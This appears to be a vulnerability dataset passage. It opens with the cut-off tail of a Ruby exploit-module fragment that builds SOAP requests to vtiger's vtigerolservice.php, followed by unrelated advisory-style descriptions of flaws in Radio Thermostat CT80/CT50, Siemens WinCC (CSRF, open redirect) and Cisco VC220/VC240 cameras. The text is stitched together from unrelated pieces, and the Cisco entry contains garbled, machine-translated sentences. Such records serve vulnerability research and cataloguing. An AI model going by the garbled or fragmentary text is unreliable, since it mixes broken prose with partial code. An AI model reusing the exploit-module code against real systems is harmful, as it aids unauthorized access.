"http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session xml.to_s end def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data }) return res end end

Radio Thermostat CT80 And CT50 with firmware 1.4.64 and earlier does not restrict access to the API, which allows remote attackers to change the operation mode, wifi connection settings, temperature thresholds, and other settings via unspecified vectors. The Radio Thermostat CT80 and CT50 are temperature controlled via WiFi. An attacker may leverage this issue to bypass certain security restrictions and perform unauthorized actions. Radio Thermostat CT80 and CT50 running versions 1.4.64 and prior are vulnerable. This product manages heating and cooling systems in homes

Cross-site request forgery (CSRF) vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to hijack the authentication of unspecified victims by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete monitoring and data acquisition (SCADA) functionality for the industrial sector, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Siemens SIMATIC WinCC TIA Portal prior to 12SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems. A remote attacker can exploit this vulnerability to hijack user authentication through incorrectly configured SIMATIC HMI panels of WinCC products

Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete monitoring and data acquisition (SCADA) functionality for the industrial sector, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a remote URL-redirection vulnerability. An attacker can leverage this issue by constructing a URI that includes a malicious site redirection. When an unsuspecting victim follows the URI, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Siemens SIMATIC WinCC TIA Portal prior to 12SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems

The Cisco VC220 and VC240 cameras allow remote attackers to cause a denial of service (WebUI outage) via crafted packets, aka Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. Cisco VC220 and VC240 Camera has a service disruption (WebUI Stop ) There are vulnerabilities that are put into a state. Vendors have confirmed this vulnerability Bug ID CSCtf73188 , CSCtf88059 , CSCtf87951 , CSCtf87908 ,and CSCtf88019 It is released as.Denial of service operation via a packet crafted by a third party (WebUI Stop ) There is a possibility of being put into a state. The Cisco VC220 and VC240 devices are network cameras. After successful use, an unauthenticated remote attacker can send a specially-made packet to the affected device, causing the affected device to reload, preventing the WebUI from accessing the camera, and denying the legitimate user. These issues are being tracked by Cisco Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. A remote attacker can exploit this vulnerability to cause a denial of service (WebUI interruption)